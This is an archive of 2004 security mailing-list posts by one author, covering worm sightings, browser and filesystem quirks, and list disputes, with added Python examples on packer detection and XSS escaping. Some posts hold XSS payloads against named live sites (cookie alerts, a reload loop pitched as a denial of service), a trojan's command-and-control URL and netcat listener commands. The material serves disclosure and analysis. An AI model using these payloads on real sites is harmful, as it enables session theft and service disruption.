2004-05-17 Thread morning_wood
Can anybody reproduce this?

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>perl -e "$a='A' x 256; system($a)"
'AAA


A' is not recognized as an internal or external command,
operable program or batch file.

[BIG CRASH HERE]

C:\>perl -v

This is perl, v5.6.1 built for MSWin32-x86-multi-thread

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Sasser author

2004-05-13 Thread morning_wood
 Sasser violates poorly designed/implemented network infrastructures.

kinda like breaking into a room via a locked door, through a window in
said locked door. The door design does not implement a proper design &
infrastructure for the intended application.

Jail the mfg of the Door?? i think not.

The door is not of suitable design for the intended security application, sure,
but someone did circumvent the security device ( the lock ) via an exploitable
flaw ( the window ). Still a clear case of breaking and entering, not to mention
circumvention of an access device ( the lock in the door ).

my 2bits.

D. Werner

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] A rather newbie question

2004-05-02 Thread morning_wood

 that sure got their attention! just keep this up but after informing the isp
that if they cannot protect your network then you would have to take active
steps to protect your network which includes all the network scanning and
namapping etc

since when is it the ISP's job to protect your network,
unless you have an agreement with them that they will be protecting your
network.

m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: Subject: [Full-Disclosure] Some suspicious files

2004-05-01 Thread morning_wood
sneaker

 possibly a beta version of a connect back trojan.

 seems to be able to use a website to transfer information between the
 attacker and the infected machine.


appredir-username=some_irc_guy
client version=sneaker_0.19
cmd-url=http://1337suxx0r.ath.cx:580/hack/sneaker/cmd.php=login-url=http://1337s
uxx0r.ath.cx:580/hack/sneaker/login.php
opfer-info=some_irc_guy
 /s7regkey={13371337-1337-1337-1337-133713371337}
SubSeven Startup Method (requires Config Setting s7regkey)

m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] McAfee Website XSS

2004-04-30 Thread morning_wood
http://vil.mcafee.com/alphar.asp?char=<SCRIPT>alert(document.cookie);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>

D.Werner
http://nothackers.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] viruses being sent to list

2004-04-30 Thread morning_wood
Tamas Feher wrote...
 1., First Amendment defines free speech. Source code has been proven
 free speech. Executables are not covered by free speech

this statement is illogical.
what exactly makes a string of characters executable ?

MZ? elf? contained in the first few bytes / bits?
please define exactly WTF you mean here.
you can convert a windows executable to a vbs... is this still an executable?

just because some order of words in a computer file is somehow compiled by a
higher language interpreter to run natively on some processing type of device,
under some operating type computing system, that this is automagically
different in some aspect??
please please explain this to me in simple, logical terms.
how about worm writers only target persons with compilers installed???
then they can just send source code and then it's compiled on the target
 ( don't many *nixy viri do exactly this? )
if i renamed a viri.exe to viri.exe.txt, then this is not in executable form,
but yet contains the same information, in the same order of bits.. ..

there is only one difference i see: someone without the ability to produce
native code from a language source to run on said processing type of system
can't run said code VS one who does and can.

are you being serious here???

m.wood



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)

2004-04-30 Thread morning_wood
 Hi morning wood. Aren't you the guy who ran a vulnerable demo version
 of some windows ircd for your security team? Oh no maybe someday
 you might be important enough to be Rosiello Jr Security Analyst.
no, i ran a personal IRCD that was attacked by the precursor of msblaster
( proc32.exe ) and it was a DoS to my connection, not a buggy IRCD.
details may be read at
http://exploitlabs.com/attack/RPC-DCOM-DD0S-attack.txt
or
http://lists.virus.org/dw-0day-0308/msg1.html
or
http://www.blacksheepnetworks.com/security/security/fulldisc/5779.html

get your facts straight mmmk

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Heads up: Possible lsass worm in the wild

2004-04-29 Thread morning_wood
dropped file: %SYSTEM%/msiwin84.exe
remote process established to: lsass.exe
remote ip:4.x.x.x

note: file msiwin84.exe was not running


this appears to be a blaster type of worm working on the first and / or
second subset of the infected host to begin scanning for more hosts.
I have not completely unpacked the binary but here are some strings.

-- snip --
DnsFlushResolve
{ache.dapi.dllVQUIT RIVMSG %s : screw you KGGo home  cCmd.Net, +MODEW ]m715
522947
6660M USERHOST/@ JOINFL :YnASSo DCC \ND  o:.bmpJd Error: fixipS enc5n  clos
*+h2(P/ t,O cu.g ACHO=Ds NEU(fkbit/s)  tal!x [EMAIL PROTECTED]'Q_  IP addrvs3

-- snip ---

based on the above, the worm / viri tries to connect to an IRC server.

anyone else experiencing this?


morning_wood
http://exploitlabs.com










Re: [Full-Disclosure] H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)

2004-04-29 Thread morning_wood
 Unrelated but funny stories of rave (Jonny Mast) getting owned:
 
 - rave gets his account backdoored on kokanin's box. He finds the obviously 
 
 Apr 24 13:25:18 rave  KOKANIN UR BOX IS FUKCING HACKED AND ALL MY 
 STUFF IS GONE!

rofl, DTORS owned again.
hi there kokanin, b0f, htols, bob  lmfao




RE: [Full-Disclosure] Cisco LEAP clueless exploit tool...

2004-04-15 Thread morning_wood
From: [EMAIL PROTECTED]
 ahh nevermind, it's clear neither of you have the
 desire to learn 
maybe they need this...

- snip -
#!/usr/bin/perl
#
# the perl of security ( gettn' a clue )
# by m.wood
#
# version 1.03
#

use CommonSense; # you do have this module... right?
use Logic; # just the facts
require IO::openMind;

print("get a clue\n");

my $awareness=$perspective,$insight;

#give input here
my $newskill=<STDIN>;

if(defined $clueless) {
 perspective($clueless);
 exit; # die here... your stupid
}

# sub acquire skill 
for $security {
 $perspective(openMind+($awareness));
if($insight-from($newskill));
 }
}
print "now you have a clue, kthnx\n";
exit;
- snip --

hope this helps,

m.wood
http://exploitlabs.com 



Re: [Full-Disclosure] Which worm?

2004-04-15 Thread morning_wood
 Another question: Is there a quick way to find out which tool compressed 
 an executable? A tool maybe?

PEiD
http://peid.has.it/

m.wood
http://exploitlabs.com 
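Added example for the packer question above (editor's code, not PEiD and not from the post): a minimal PE section-table parser that names a packer from its section names and otherwise flags the generic packed shape, an entry point in the last section next to an executable section with no raw data. The packer-name table is a small hand-picked assumption, and the three PE images are constructed in the block (headers only, not runnable programs).

```python
import struct
from typing import Dict, List, Optional

# PE section characteristic flags (winnt.h).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumption: a short hand-picked table, nothing like PEiD's signature database.
PACKER_SECTION_NAMES = {
    "UPX0": "UPX", "UPX1": "UPX", "UPX2": "UPX",
    ".aspack": "ASPack", ".adata": "ASPack",
    ".petite": "Petite",
    ".MPRESS1": "MPRESS", ".MPRESS2": "MPRESS",
    ".vmp0": "VMProtect", ".vmp1": "VMProtect",
    ".themida": "Themida",
}


def parse_pe(data: bytes) -> Dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    machine, nsect, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]        # AddressOfEntryPoint
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize, "virtual_address": vaddr,
            "raw_size": rawsize, "raw_pointer": rawptr, "characteristics": chars,
        })
    return {"machine": machine, "entry_rva": entry_rva, "sections": sections}


def entry_section(pe: Dict) -> Optional[Dict]:
    """Section whose virtual range holds the entry point (packers put it in their stub)."""
    for s in pe["sections"]:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= pe["entry_rva"] < s["virtual_address"] + span:
            return s
    return None


def packer_hint(data: bytes) -> Optional[str]:
    """Name the packer by section name, or flag the generic shape: entry point in the
    last section plus an executable section with no raw data (filled in at run time)."""
    pe = parse_pe(data)
    for s in pe["sections"]:
        if s["name"] in PACKER_SECTION_NAMES:
            return PACKER_SECTION_NAMES[s["name"]]
    entry = entry_section(pe)
    empty_exec = [s for s in pe["sections"]
                  if s["raw_size"] == 0 and s["virtual_size"] > 0
                  and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE]
    if entry is not None and entry is pe["sections"][-1] and empty_exec:
        return "unknown packer (entry in last section, empty executable section)"
    return None


def build_pe(sections: List[tuple], entry_rva: int) -> bytes:
    """Construct a minimal PE32 image (headers only) for the demo."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew -> 0x40
    opt_size = 224                                                    # PE32 optional header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                             # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                    vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, rawsize, rawptr, chars in sections)
    return dos + coff + bytes(opt) + table


# Constructed samples: a UPX-style layout, a plain compiler layout, and an unnamed
# packer with the generic shape. Tuple order: name, vaddr, vsize, rawsize, rawptr, flags.
RX = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE
RWX = RX | IMAGE_SCN_MEM_WRITE
RW_DATA = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_INITIALIZED_DATA
UPX_SAMPLE = build_pe([
    ("UPX0", 0x1000, 0x8000, 0, 0, RWX),
    ("UPX1", 0x9000, 0x3000, 0x2800, 0x400, RWX | IMAGE_SCN_CNT_CODE),
    (".rsrc", 0xC000, 0x1000, 0x800, 0x2C00, IMAGE_SCN_MEM_READ | IMAGE_SCN_CNT_INITIALIZED_DATA),
], entry_rva=0xB2A0)
PLAIN_SAMPLE = build_pe([
    (".text", 0x1000, 0x4000, 0x4000, 0x400, RX | IMAGE_SCN_CNT_CODE),
    (".data", 0x5000, 0x1000, 0x400, 0x4400, RW_DATA),
], entry_rva=0x1200)
GENERIC_SAMPLE = build_pe([
    ("x0", 0x1000, 0x5000, 0, 0, RWX),
    ("x1", 0x6000, 0x2000, 0x1800, 0x400, RWX | IMAGE_SCN_CNT_CODE),
], entry_rva=0x6A00)
```

Section names are trivially renamed by anyone who cares, so treat a name match as a hint and the generic shape (plus section entropy, not shown here) as the stronger signal.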



[Full-Disclosure] Browser bugs [DoS] - Do they bite?

2004-04-11 Thread morning_wood
  Browser bugs [DoS] ... where will you draw a line?

 DoS bugs that cause permanent damage are treated differently, of course.
 For example, I could imagine a bug that would corrupt some critical file

what about Browser bugs[DoS] an XSS vulnerable site?
simple javascript leveraged against a host that has an XSS issue.
so if you could embed <script>javascript:location.reload()</script>
in a high traffic, XSS'able site, you could cause a denial of service
to the webserver from the users trying to view the site.

http://host/stupidscript?someoption=<script>javascript:location.reload()</script>


will continually refresh to http://host/stupidscript , since it is XSS'able, the
server returns the script only to be executed again and again and ( you get the
picture )
could be used legitimately for a net-sit-in to deny a site as well.

see: http://nothackers.org/pipermail/0day/2003-October/000236.html

and exactly why does this produce such an odd result?
http://ws.arin.net/cgi-bin/whois.pl?queryinput=<script>javascript:location.reload()</script>

Search results for:
(N) orwegian Telecommunications Administration (OTA)
(A) sian Development Bank (SDB-1)
USDA - Office of Operations (UOO)
Shipleys Donut Shops


 ( yum! donuts.  but they did fix their XSS )



m.wood
http://exploitlabs.com
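Added example for the reflected-XSS post above (editor's code, not from the post and not the scripts it names): the vulnerable reflection next to its hardened form, plus a request-side check of the kind one would run over web logs. The `queryinput` parameter name is taken from the post's whois URL; the template, the host and the sample requests are constructed.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The page template the script fills in; {query} is where user input lands.
TEMPLATE = "<html><body><h1>Search results for: {query}</h1></body></html>"


def _param(url: str, name: str) -> str:
    """Pull one query parameter out of a request URL (percent-decoded, as a CGI sees it)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_unsafe(url: str, param: str = "queryinput") -> str:
    """What the vulnerable script did: reflect the parameter into the page verbatim."""
    return TEMPLATE.format(query=_param(url, param))


def render_safe(url: str, param: str = "queryinput") -> str:
    """Hardened version: HTML-encode the value so the browser treats it as text, not markup."""
    return TEMPLATE.format(query=html.escape(_param(url, param), quote=True))


def reflects_markup(response: str, payload: str) -> bool:
    """True if the payload reaches the response with its angle brackets intact."""
    return payload in response


def suspicious_request(url: str) -> bool:
    """Log-side check: flag requests whose decoded query carries script markup or a
    javascript: URL, however it was percent-encoded on the wire."""
    values = parse_qs(urlsplit(url).query).values()
    decoded = " ".join(v for vals in values for v in vals).lower()
    return "<script" in decoded or "javascript:" in decoded


# Constructed requests: the reload payload from the post, plain and percent-encoded.
PAYLOAD = "<script>javascript:location.reload()</script>"
PLAIN_URL = "http://host/stupidscript?someoption=1&queryinput=" + PAYLOAD
ENCODED_URL = ("http://host/stupidscript?queryinput="
               "%3Cscript%3Ejavascript%3Alocation.reload()%3C/script%3E")
BENIGN_URL = "http://host/stupidscript?queryinput=donut+shops"

if __name__ == "__main__":
    print(render_unsafe(PLAIN_URL))
    print(render_safe(PLAIN_URL))
    for u in (PLAIN_URL, ENCODED_URL, BENIGN_URL):
        print(suspicious_request(u), u)
```

Encoding at the point of output is what closes the hole; the request check only tells you it is being probed, and it is easy to evade, so it belongs in monitoring rather than in the fix.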



Re: [Full-Disclosure] FAT32 input output = null?

2004-04-08 Thread morning_wood
executing this at the dos prompt would create a zero byte m.wood file
> m.wood
looks like a feature equivalent to touch m.wood or touch filename 

LMFAO

m.wood



Re: [Full-Disclosure] FAT32 input output = null?

2004-04-07 Thread morning_wood
 [EMAIL PROTECTED]:~$ more testfile.txt
 Let's try this in Linux
 [EMAIL PROTECTED]:~$ ls -al testfile.txt
 - -rw-r--r--1 chrisusers  24 Apr  7 12:43 testfile.txt
 [EMAIL PROTECTED]:~$ ./testfile.txt>testfile.txt
 - -bash: ./testfile.txt: Permission denied
 [EMAIL PROTECTED]:~$ more testfile.txt
 [EMAIL PROTECTED]:~$ ls -al testfile.txt
 - -rw-r--r--1 chrisusers   0 Apr  7 12:44 testfile.txt
 [EMAIL PROTECTED]:~$

anyone try with an executable?
 maybe 
linibox$ pwd
/usr/bin
linibox$ bash > bash 



m.wood



Re: [Full-Disclosure] FAT32 input output = null?

2004-04-07 Thread morning_wood
 You can also delete files by using the del command. I tested this with the 
 5.1 ntos kernel (Slackware XP):
 
 C:\del testfile.exe

if you were trying to be sarcastic in saying this is
normal, any dummy knows that  then you failed
horrendously, sir.
where did the delete command come from?
this has nothing to do with any system command
it was simply an odd behavior whereby piping
output of a file into itself causes a 0 byte or corrupted file
C:\>del.exe > del.exe
in particular, executable files.


m.wood




[Full-Disclosure] FAT32 input output = null?

2004-04-06 Thread morning_wood
Fat32 file output redirect overwrites self.
===

odd behavior... ?

1.) console application output redirected to itself ( file.ext > file.ext )
C:\test>program.exe > program.exe
 program.exe
The process cannot access the file because it is being used by another process.

ok great, normal error ( i thought )
by seeing this error, one might think phew, i just saved myself from
overwriting that file
but

2.) try running original program
C:\test>program.exe
[popup]
C:\test\program is not a valid Win32 application.
[/popup]
Access is denied.

uh-o

3.) directory listing
C:\test>dir
 Volume in drive C has no label.
 Volume Serial Number is 1F2E-1405

 Directory of C:\test

02/16/2003  03:00 AM    <DIR>          .
02/16/2003  03:00 AM    <DIR>          ..
02/16/2003  03:31 AM                 0 program.exe
               9 File(s)              0 bytes
               2 Dir(s)     435,847,168 bytes free


i do not know if this is proper behavior.
but it would appear that you SHOULD be safe due to windows
file locking, and the safety is further bolstered by a nice warning.
but alas... Access Denied! 

so by observance we can deduce the following:
a. windows reads the originating program into memory ( fully(?)
b. the file output redirection ( > ) causes a write to file to the redirection
call back upon itself, and thus begins overwriting the original file.
c. windows detects the file access and determines that this action is illegal
and halts the operation and warns the user.


note: not tested under other disc formats.

Donnie Werner
http://exploitlabs.com 
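Added example for the `file > file` thread above (editor's code, not from the post): the step order that produces the zero-byte file, reproduced in Python with plain file opens so it runs on any OS, the noclobber guard that POSIX shells offer against it, and the temp-file-plus-rename pattern for rewriting a file in place. File names and contents are constructed.

```python
import os
import tempfile


def self_redirect_size(content: bytes = b"hello world\n") -> int:
    """Reproduce `file > file` in process order: the shell opens the redirection target
    for writing, which truncates it, *before* the command starts and reads its input."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "program.bin")
        with open(path, "wb") as f:
            f.write(content)
        out = open(path, "wb")            # step 1: shell opens target (O_TRUNC -> 0 bytes)
        with open(path, "rb") as src:     # step 2: the command opens its input...
            data = src.read()             # ...and finds nothing left to read
        out.write(data)                   # step 3: the command's (empty) output is written
        out.close()
        return os.path.getsize(path)      # 0, whatever the file system


def noclobber_size(content: bytes = b"hello world\n") -> int:
    """The POSIX-shell `set -C` (noclobber) guard: O_EXCL refuses to open an existing
    file for truncation, so the original survives untouched."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "program.bin")
        with open(path, "wb") as f:
            f.write(content)
        try:
            fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
            os.close(fd)
        except FileExistsError:
            pass                          # refused: nothing was written
        return os.path.getsize(path)      # len(content)


def safe_rewrite(content: bytes, transform) -> bytes:
    """In-place rewrite done right: write the result to a temp file in the same
    directory, then atomically replace the original; readers never see a half-written file."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "program.bin")
        with open(path, "wb") as f:
            f.write(content)
        fd, tmp = tempfile.mkstemp(dir=d, prefix="program.bin.")
        with os.fdopen(fd, "wb") as dst, open(path, "rb") as src:
            dst.write(transform(src.read()))
        os.replace(tmp, path)
        with open(path, "rb") as f:
            return f.read()


if __name__ == "__main__":
    print("file > file leaves", self_redirect_size(), "bytes")
    print("with noclobber:", noclobber_size(), "bytes")
    print("safe rewrite:", safe_rewrite(b"hello world\n", bytes.upper))
```

The lesson for scripts that post-process their own output: never redirect onto the input; write beside it and rename, and turn on noclobber in interactive shells so the typo fails loudly instead of silently emptying the file.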










Re: [Full-Disclosure] MCSE training question

2004-04-05 Thread morning_wood
Au contraire, the first thing we do when we go onsite to work on a windows box
is ask my client to reboot it first, particularly if it is a server, as
occasionally they do not come back up, and we do not want to be blamed
just because the OS is unstable

and you claim to be a security professional?
( Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA )

the first thing would be to sit down at the suspect console and observe.
the second thing would be to... observe.
then i might consider a course of action...
possibly the box in question is unstable because of a compromise,
or a worm or a 0day... what about that Curt?
never would i ( or tell anyone ) to just reboot that box before i touch it
now i know why fortune 500 companies get horrendous infections.

shocked and awed

Donnie Werner
http://exploitlabs.com 



Re: [Full-Disclosure] ron1n phone home, episode 2

2004-04-04 Thread morning_wood
k-rad this is old... mmmk
possibly someone not from bbs days may not remember..
i got offline between 93-95

 We present to you the second installment of our introductory series
 into the exciting world of Mostly Harmless Hacking. Hacking from Windows 95.
Copyright 1997

( recycling old zine's huh? )

m.wood



[Full-Disclosure] Microsoft Security CD

2004-04-03 Thread morning_wood
well... i got mine, but funny thing..

<p><strong>This CD requires that JavaScript be enabled for your Web
browser.</strong> </p>
<p>If you need help re-enabling JavaScript for your browser, <a
href="http://go.microsoft.com/fwlink/?linkid=9580" target="_blank">click
  here</a>.</p>

then offers this screen...
You are downloading the file:
 WXPstart.hta from d:\Content
open save cancel moreinfo

being inquisitive and security minded i chose save
then i was left with a blank browser.
and a hta file on my desktop..
DOH!

anyway, the major XP/2Kx updates are as listed...
 Directory of D:\Content\fullfixes

02/05/2004  04:00 AM    <DIR>          .
02/05/2004  04:00 AM    <DIR>          ..
02/05/2004  04:00 AM   970,312 DirectX9-KB819696-x86-ENU.exe
02/05/2004  04:00 AM10,135,688 MPSetupXP.exe
02/05/2004  04:00 AM   818,464 Q819696_WXP_SP2_x86_ENU(DX8).exe
02/05/2004  04:00 AM   135,477,136 W2KSP4_EN.EXE
02/05/2004  04:00 AM   938,856 Windows2000-KB824146-x86-ENU.exe
02/05/2004  04:00 AM   367,752 WindowsMedia8-KB817787-x86-ENU.exe
02/05/2004  04:00 AM   433,952 WindowsXP-KB823182-x86-ENU.exe
02/05/2004  04:00 AM   346,400 WindowsXP-KB824105-x86-ENU.exe
02/05/2004  04:00 AM   305,248 WindowsXP-KB825119-x86-ENU.exe
02/05/2004  04:00 AM 9,442,912 WindowsXP-KB826939-x86-ENU.exe
02/05/2004  04:00 AM   365,664 WindowsXP-KB828035-x86-ENU.exe
02/05/2004  04:00 AM   369,504 js56nen.exe
02/05/2004  04:00 AM 1,992,832 q330994.exe
02/05/2004  04:00 AM 2,203,776 q828750.exe
02/05/2004  04:00 AM   131,170,400 xpsp1a_en_x86.exe
  15 File(s)295,338,896 bytes
   2 Dir(s)   0 bytes free




Donnie Werner
http://exploitlabs.com



Re: [Full-Disclosure] erase with magnet

2004-04-03 Thread morning_wood
 Is it possible to erase data on a hard disk drive 
with a powerful magnet, but then be able to use the drive and the PC again? 

yes

m.wood



Re: [Full-Disclosure] Re: [FD] FD should block attachments

2004-04-02 Thread morning_wood
 Since some folks presumably want to be able to send and receive the latest
 MS innovations and other attachments, why don't you just block whatever
 you don't want to receive? I certainly do.
 

yes, exactly why is this concept so hard to get?
i'm presuming that the majority of complainants
are either not very security minded to begin with,
or are complete n00bs ( joined the list cuz they
saw it was on CNN ). i like attachments, whether
they are PoC, viri, worm, pdf, etc etc. i like the choice
to choose.
btw: i use Microsoft products [OE] to post to this list,
and have never got any virus or worm or anything
else i didn't want. and i do not run any AV nor filtering
nor firewall to this box. 
am i missing something here?
 because i really do not see the issue.

morning_wood
http://exploitlabs.com 



Re: [Full-Disclosure] mirc 6.14

2004-03-28 Thread morning_wood
 every one is blabbling about some new mirc 6.14 dcc exploit. Is this true?
 has any body confirmed this?

http://searchirc.com/boards/viewtopic.php?t=1115
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=mirc+6.14+exploit&btnG=Google+Search

i like Google©


m.wood



Re: [Full-Disclosure] SHUT THE FUCK UP

2004-03-24 Thread morning_wood
 I'd like to suggest everybody starts sending an annoying mail back to the
 poster of useless crap like this AND NOT TO THE LIST.

 I try to make a habit of sending n00b mail to the AV notices i receive
as someone on this list has / does get infected, my address gets spoofed,
and mr.N00bular with GheeWhizzSpamAntiVirusPopupblocker© e-mail
gateway/firewall/av utility spits out asinine mail to me that contributes
to a total waste of bandwidth, and a loss of time® for all parties concerned.

my two bits
Donnie Werner
http://exploitlabs.com

time® is a trademark of Universe©
Public use permitted by fair use agreement ( copyright [NULL] )



Re: [Full-Disclosure] Re: text

2004-03-24 Thread morning_wood
 However, in this case, *I* sent the virus.  I had the word t e x t . p i 
 f in the body of my message (without the spaces, of course), and the 
 poorly configured AV scanners detected a virus.
 

about as funny as this
( http://lists.netsys.com/pipermail/full-disclosure/2003-May/005244.html )
when I sent a text message with only viri / worm names in it.
I should generate a new one to see what comes out the other end


D.Werner



Re: [Full-Disclosure] winxp home expusure

2004-03-22 Thread morning_wood
 Hi,
 
 How bad is it to have Win XP HOME at work - in LAN ?
 I ask for security reasons - I just logged off in winxp home from 
 vncviewer and it said -closing all network connections ...- and my vnc 
 connection still remained active :)?
 

sometimes winXP's tcp parameters keep a connection open for 4 minutes or more.
try using tcpview.exe ( www.sysinternals.com/ntw2k/source/tcpview.shtml )
also, some programs don't exit clean, etc etc...

Donnie Werner
http://exploitlabs.com 




Re: [Full-Disclosure] HOTMAIL / PASSPORT: phishing expedition

2004-03-18 Thread morning_wood
 buddy<iframe src="http://www.malware.com/pithy.html">
so could this url be considered a phishing scam ?
 regardless of your implied intent? It does pretend
to be a genuine login, and i am sure you are collecting successful
attempts to a log ( right? ). Has your demo overstepped the bounds
of  security research into the realm of collecting confidential 
( login / password ) information for purposes of access circumvention ?

currious,

Donnie Werner
http://exploitlabs.com



[Full-Disclosure] Microsoft Security, baby steps ?

2004-03-13 Thread morning_wood
Gimme a break..
http://go.microsoft.com/?LinkID=422101

although this could be amusing...
http://www.microsoft.com/security/protect/cd/order.asp


m.wood



Re: [Full-Disclosure] Caching a sniffer

2004-03-11 Thread morning_wood
  How can i know if there a sniffer running in my network?
 
 When you wake up one day to find that you're 0wn3d :-)
 
 Seriously, about the only way I can think of to detect a sniffer with
 its transmit leads cut is with a Time Domain Reflectometer (TDR) and
 look for an unexplained impedance bump.
 

try your detection tools on a simple sniffer at
http://exploitlabs.com/files/misc/xsniff.zip

does not use pcap or any other cap libs that I am aware of.

m.wood




[Full-Disclosure] mydoom.c information

2004-03-07 Thread morning_wood
  bascially looking for sync-src-1.00.tbz.  That message was posted to this
 
 avail on infected hosts
 
  This is how I came to be in possession of it:
  
   nc -l -p 3127 > doomjuice.dump
  
   You will probably want to write a
  loop to restart netcat because it exits after a successful transfer.
  
 
 nc -L -p 3127 > out.txt   
 note:  -L   will not exit your netcat,  as it is for a persistent listener.
 
 please see 
 http://lists.netsys.com/pipermail/full-disclosure/2004-February/017126.html
 
 as i do not wish to type-iterate.
 
 Donnie Werner
 http://exploitlabs.com 



Re: [Full-Disclosure] mydoom.c information

2004-03-07 Thread morning_wood
 Now I'm confused...
 
 [EMAIL PROTECTED] /storage/virii] $ nc -h
 GNU netcat 0.7.1, a rewrite of the famous networking tool.
 Basic usages:
 connect to somewhere:  nc [options] hostname port [port] ...
 listen for inbound:nc -l -p port [options] [hostname] [port] ...
 tunnel to somewhere:   nc -L hostname:port -p port [options]
  
 Mandatory arguments to long options are mandatory for short options too.
 Options:
   -c, --closeclose connection on EOF from stdin
   -e, --exec=PROGRAM program to exec after connect
   -g, --gateway=LIST source-routing hop point[s], up to 8
   -G, --pointer=NUM  source-routing pointer: 4, 8, 12, ...
   -h, --help display this help and exit
   -i, --interval=SECSdelay interval for lines sent, ports scanned
   -l, --listen   listen mode, for inbound connects
   -L, --tunnel=ADDRESS:PORT  forward local port to remote address
 
 /* snip */
 
 
 Does persistent listener == tunnel?


hmm.. my netcat is different and i compiled from Hobbit's sources..

 snip ---

C:\Documents and Settings\Administrator>nc -h
[v1.10 NT]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d  detach from console, background mode

-e prog inbound program to exec [dangerous!!]
-g gateway  source-routing hop point[s], up to 8
-G num  source-routing pointer: 4, 8, 12, ...
-h  this cruft
-i secs delay interval for lines sent, ports scanned
-l  listen mode, for inbound connects
-L  listen harder, re-listen on socket close
-n  numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r  randomize local and remote ports
-s addr local source address
-t  answer TELNET negotiation
-u  UDP mode
-v  verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z  zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
--- snip 

note:  -L  listen harder, re-listen on socket close

maybe confusion rules the day?
or your GNU netcat 0.7.1,  a rewrite of the famous networking tool.
 netcat really sucks


Donnie Werner
http://exploitlabs.com 



Re: [Full-Disclosure] Scary Question

2004-03-01 Thread morning_wood
 I heard that it was possible to cause irreparable
 damage to any electronic circuit through
 certain waves or radio emissions ( I'm not qualified
 in this subject ).

ESD
Google is my friend..
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=esd
make him yours.

D.Werner
http://exploitlabs.com



Re: [Full-Disclosure] Re: Re: GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution

2004-02-18 Thread morning_wood
 Many of these systems come from the vendor with default shares enabled 
 allowing anonymous access, no patches, default passwords, no anti-virus, 
 etc. Many health-care organizations then proceed to plug them into the 
 general network and pretend that nothing's wrong.

ahem... this is not a windows issue.

Sounds like you need a vendor that does its job,
not just VAR you to death and leave you to
your own destruction.. 

Donnie Werner
[EMAIL PROTECTED]
http://exploitlabs.com
360-312-8011 



[Full-Disclosure] trust? - win2k source code tools

2004-02-16 Thread morning_wood
NOW EVERY EXECUTABLE IS TRUSTED AND DIGITALLY SIGNED

found this interesting...
\win2k\private\inet\mshtml\build\scripts\tools\x86

iexpress.exe 
signcode.exe
makecert.exe ( DigSig.dll )

( in fast food voice ) and who would you like your package to be certified
from today sir?
\win2k\private\ispu\pkitrust\initpki\certs\



looks like the viri / trojan kiddies will have some fun with this.
yikes to PE format executables.

alas... i could be wrong,

m.wood



Re: [Full-Disclosure] GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution

2004-02-15 Thread morning_wood
  IE6 is not vulnerable, so I guess I'll get back to work.  My Warhol
  worm will have to wait a bit...

Dunno but your message crashes OE on (pre)view.
no warning, no nothin... OE just *bink* closes
NICE JOB [EMAIL PROTECTED] 

guess those sources are good for something huh 
( , ubber biscuit? )


m.wood



Re: [Full-Disclosure] GAYER THAN AIDS ADVISORY #01: IE 5 remote code execution

2004-02-15 Thread morning_wood
 please enlighten us on your versions numbers / patch levels wood.
 -KF
 
 
 morning_wood wrote:
